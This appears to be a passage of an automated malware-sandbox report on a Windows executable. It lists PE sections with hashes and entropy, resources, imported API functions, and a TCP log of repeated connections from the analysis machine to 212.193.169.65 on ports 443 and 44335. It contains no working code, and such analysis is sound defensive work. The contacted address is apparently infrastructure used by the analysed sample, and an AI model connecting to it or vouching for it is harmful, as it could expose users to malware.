Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x143f8 | 0x14400 | 345db2b6911addc85b53f32245f969a0 | False | 0.5487316743827161 | data | 6.482204165609409 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext | 0x16000 | 0xbe8 | 0xc00 | 2e74d968caedeb2d71b9505530d43907 | False | 0.6243489583333334 | data | 6.0151573487586 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x17000 | 0xd9c | 0xe00 | d5b22eff9e08edaa95f493c1a71158c0 | False | 0.2924107142857143 | data | 2.669288666959085 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0x18000 | 0x5750 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x1e000 | 0xf9e | 0x1000 | b47eaca4c149ee829de76a342b5560d5 | False | 0.35595703125 | data | 4.9677831942996935 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x1f000 | 0x8 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x20000 | 0x18 | 0x200 | 3746f5876803f8f30db5bb2deb8772ae | False | 0.05078125 | data | 0.190488766434666 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x21000 | 0x4b7e4 | 0x4b800 | cf0453380960751e2144176aa94c1d7f | False | 0.2783429480546358 | data | 5.429379445497465 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x2138c | 0x4180c | Device independent bitmap graphic, 255 x 510 x 32, image size 260100, resolution 3779 x 3779 px/m | English | United States | 0.2926872903466269
RT_STRING | 0x62b98 | 0xc4 | data |  |  | 0.5969387755102041
RT_STRING | 0x62c5c | 0xcc | data |  |  | 0.6225490196078431
RT_STRING | 0x62d28 | 0x174 | data |  |  | 0.5510752688172043
RT_STRING | 0x62e9c | 0x39c | data |  |  | 0.34523809523809523
RT_STRING | 0x63238 | 0x34c | data |  |  | 0.4218009478672986
RT_STRING | 0x63584 | 0x294 | data |  |  | 0.4106060606060606
RT_RCDATA | 0x63818 | 0x82e8 | data | English | United States | 0.11261637622344235
RT_RCDATA | 0x6bb00 | 0x10 | data |  |  | 1.5
RT_RCDATA | 0x6bb10 | 0x1b0 | data |  |  | 0.8194444444444444
RT_RCDATA | 0x6bcc0 | 0x2c | data |  |  | 1.1590909090909092
RT_GROUP_ICON | 0x6bcec | 0x14 | data | English | United States | 1.2
RT_VERSION | 0x6bd00 | 0x4b8 | COM executable for DOS | English | United States | 0.26158940397350994
RT_MANIFEST | 0x6c1b8 | 0x62c | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.4240506329113924
DLL | Import
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExW, RegOpenKeyExW, RegCloseKey
user32.dll | GetKeyboardType, LoadStringW, MessageBoxA, CharNextW
kernel32.dll | GetACP, Sleep, VirtualFree, VirtualAlloc, GetSystemInfo, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenW, lstrcpynW, LoadLibraryExW, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetCommandLineW, FreeLibrary, FindFirstFileW, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle, CloseHandle
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleW
user32.dll | CreateWindowExW, TranslateMessage, SetWindowLongW, PeekMessageW, MsgWaitForMultipleObjects, MessageBoxW, LoadStringW, GetSystemMetrics, ExitWindowsEx, DispatchMessageW, DestroyWindow, CharUpperBuffW, CallWindowProcW
kernel32.dll | WriteFile, WideCharToMultiByte, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, SizeofResource, SignalObjectAndWait, SetLastError, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, RemoveDirectoryW, ReadFile, MultiByteToWideChar, LockResource, LoadResource, LoadLibraryW, LeaveCriticalSection, InitializeCriticalSection, GetWindowsDirectoryW, GetVersionExW, GetUserDefaultLangID, GetThreadLocale, GetSystemInfo, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesW, GetExitCodeProcess, GetEnvironmentVariableW, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentProcess, GetCommandLineW, GetCPInfo, InterlockedExchange, InterlockedCompareExchange, FreeLibrary, FormatMessageW, FindResourceW, EnumCalendarInfoW, EnterCriticalSection, DeleteFileW, DeleteCriticalSection, CreateProcessW, CreateFileW, CreateEventW, CreateDirectoryW, CompareStringW, CloseHandle
advapi32.dll | RegQueryValueExW, RegOpenKeyExW, RegCloseKey, OpenProcessToken, LookupPrivilegeValueW
comctl32.dll | InitCommonControls
kernel32.dll | Sleep
advapi32.dll | AdjustTokenPrivileges
oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                          Nov 19, 2024 18:57:14.568525076 CET49998443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:14.569120884 CET49998443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:14.569140911 CET44349998212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:15.558163881 CET44349998212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:15.558240891 CET49998443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:15.560152054 CET49998443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:15.560161114 CET44349998212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:15.560508966 CET44349998212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:15.561162949 CET49998443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:15.561448097 CET49998443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:15.561481953 CET44349998212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:15.561655998 CET44349998212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:15.561686993 CET44349998212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:15.561753988 CET49998443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:15.561775923 CET49998443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:15.572187901 CET50001443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:15.572266102 CET44350001212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:15.572376966 CET50001443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:15.572813034 CET50001443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:15.572843075 CET44350001212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:16.288032055 CET44350001212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:16.288136005 CET50001443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:16.290174961 CET50001443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:16.290182114 CET44350001212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:16.290451050 CET44350001212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:16.291270018 CET50001443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:16.291631937 CET50001443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:16.291667938 CET44350001212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:16.291774035 CET44350001212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:16.291800976 CET44350001212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:16.291821957 CET50001443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:16.291830063 CET44350001212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:16.291893005 CET50001443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:16.291929007 CET50001443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:16.291929007 CET50001443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:16.382366896 CET50004443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:16.382412910 CET44350004212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:16.382581949 CET50004443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:16.383003950 CET50004443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:16.383014917 CET44350004212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:17.201498985 CET44350004212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:17.201694012 CET50004443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:17.214456081 CET50004443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:17.214478016 CET44350004212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:17.214715958 CET44350004212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:17.215543032 CET50004443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:17.218080044 CET50004443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:17.218112946 CET44350004212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:17.218214035 CET44350004212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:17.218214989 CET50004443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:17.218246937 CET44350004212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:17.218262911 CET50004443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:17.218300104 CET50004443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:17.323148012 CET50007443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:17.323189020 CET44350007212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:17.323301077 CET50007443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:17.323705912 CET50007443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:17.323736906 CET44350007212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:18.167290926 CET44350007212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:18.167387009 CET50007443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:18.168698072 CET50007443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:18.168714046 CET44350007212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:18.169023991 CET44350007212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:18.169642925 CET50007443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:18.169845104 CET50007443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:18.169873953 CET44350007212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:18.169977903 CET50007443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:18.170001984 CET44350007212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:18.170034885 CET44350007212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:18.170097113 CET50007443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:18.170124054 CET50007443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:18.218794107 CET50010443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:18.218837023 CET44350010212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:18.218898058 CET50010443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:18.219372988 CET50010443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:18.219386101 CET44350010212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:19.045169115 CET44350010212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:19.045512915 CET50010443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:19.046539068 CET50010443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:19.046555042 CET44350010212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:19.046865940 CET44350010212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:19.047518015 CET50010443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:19.047884941 CET50010443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:19.047914028 CET44350010212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:19.048041105 CET50010443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:19.048048019 CET44350010212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:19.048084974 CET44350010212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:19.048118114 CET50010443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:19.048166990 CET50010443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:19.123006105 CET50013443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:19.123049974 CET44350013212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:19.123126030 CET50013443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:19.123507977 CET50013443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:19.123521090 CET44350013212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:19.917918921 CET44350013212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:19.918020964 CET50013443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:19.947371006 CET50013443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:19.947417974 CET44350013212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:19.947783947 CET44350013212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:19.949867964 CET50013443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:19.951134920 CET50013443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:19.951173067 CET44350013212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:19.951317072 CET44350013212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:19.951356888 CET44350013212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:19.951450109 CET50013443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:19.951523066 CET50013443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:20.085031986 CET50016443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:20.085084915 CET44350016212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:20.085253000 CET50016443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:20.085810900 CET50016443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:20.085824966 CET44350016212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:20.886835098 CET44350016212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:20.886912107 CET50016443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:20.889698982 CET50016443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:20.889719009 CET44350016212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:20.890073061 CET44350016212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:20.890841007 CET50016443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:20.892013073 CET50016443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:20.892047882 CET44350016212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:20.892189980 CET44350016212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:20.892225027 CET44350016212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:20.892291069 CET50016443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:20.892373085 CET50016443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:20.961354971 CET50019443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:20.961404085 CET44350019212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:20.961471081 CET50019443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:20.962117910 CET50019443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:20.962142944 CET44350019212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:21.755839109 CET44350019212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:21.755927086 CET50019443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:21.757172108 CET50019443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:21.757181883 CET44350019212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:21.757503986 CET44350019212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:21.758167982 CET50019443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:21.758420944 CET50019443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:30.704205036 CET44350046212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:30.704267025 CET50046443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:30.704267025 CET50046443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:30.724792957 CET50049443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:30.724855900 CET44350049212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:30.724937916 CET50049443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:30.725796938 CET50049443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:30.725820065 CET44350049212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:31.521681070 CET44350049212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:31.521765947 CET50049443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:31.523597956 CET50049443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:31.523610115 CET44350049212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:31.523919106 CET44350049212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:31.526885986 CET50049443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:31.527270079 CET50049443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:31.527292967 CET44350049212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:31.527412891 CET44350049212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:31.527446985 CET44350049212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:31.527488947 CET50049443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:31.662506104 CET50049443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:31.687154055 CET50052443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:31.687191963 CET44350052212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:31.687325001 CET50052443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:31.687931061 CET50052443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:31.687943935 CET44350052212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:32.486083984 CET44350052212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:32.486191034 CET50052443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:32.487607956 CET50052443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:32.487617970 CET44350052212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:32.487885952 CET44350052212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:32.488776922 CET50052443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:32.489347935 CET50052443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:32.489378929 CET44350052212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:32.489440918 CET50052443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:32.489489079 CET44350052212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:32.489520073 CET44350052212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:32.489577055 CET50052443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:32.489593029 CET50052443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:32.498193979 CET50055443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:32.498254061 CET44350055212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:32.498312950 CET50055443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:32.498743057 CET50055443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:32.498756886 CET44350055212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:33.293648005 CET44350055212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:33.293730021 CET50055443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:33.295248985 CET50055443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:33.295258999 CET44350055212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:33.295504093 CET44350055212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:33.296304941 CET50055443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:33.296562910 CET50055443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:33.296588898 CET44350055212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:33.296686888 CET44350055212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:33.296715021 CET44350055212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:33.296772003 CET50055443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:33.418287039 CET50055443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:33.430294037 CET50058443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:33.430339098 CET44350058212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:33.430447102 CET50058443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:33.431103945 CET50058443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:33.431121111 CET44350058212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:34.259682894 CET44350058212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:34.259764910 CET50058443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:34.261343002 CET50058443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:34.261353016 CET44350058212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:34.261728048 CET44350058212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:34.262774944 CET50058443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:34.262999058 CET44350058212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:34.263041973 CET44350058212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:34.263133049 CET50058443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:34.325016022 CET50058443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:34.342195034 CET5006144335192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:34.348448038 CET4433550061212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:34.348570108 CET5006144335192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:34.349225044 CET5006144335192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:34.354589939 CET4433550061212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:35.042474031 CET4433550061212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:35.042608976 CET4433550061212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:35.042618990 CET4433550061212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:35.042661905 CET4433550061212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:35.042671919 CET4433550061212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:35.042731047 CET5006144335192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:35.043309927 CET5006144335192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:35.128778934 CET4433550061212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:35.132534027 CET5006144335192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:35.137293100 CET4433550061212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:35.352468967 CET4433550061212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:35.353288889 CET5006144335192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:35.354269028 CET5006144335192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:35.355549097 CET5006144335192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:35.355695009 CET5006144335192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:35.358311892 CET4433550061212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:35.359101057 CET4433550061212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:35.360405922 CET4433550061212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:35.360884905 CET4433550061212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:35.363284111 CET5006144335192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:35.374186993 CET50064443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:35.374231100 CET44350064212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:35.374310017 CET50064443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:35.374702930 CET50064443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:35.374713898 CET44350064212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:36.351874113 CET44350064212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:36.351943016 CET50064443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:36.353626966 CET50064443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:36.353634119 CET44350064212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:36.353887081 CET44350064212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:36.354587078 CET50064443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:36.356148005 CET50064443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:36.356194973 CET44350064212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:36.356301069 CET44350064212.193.169.65192.168.2.5
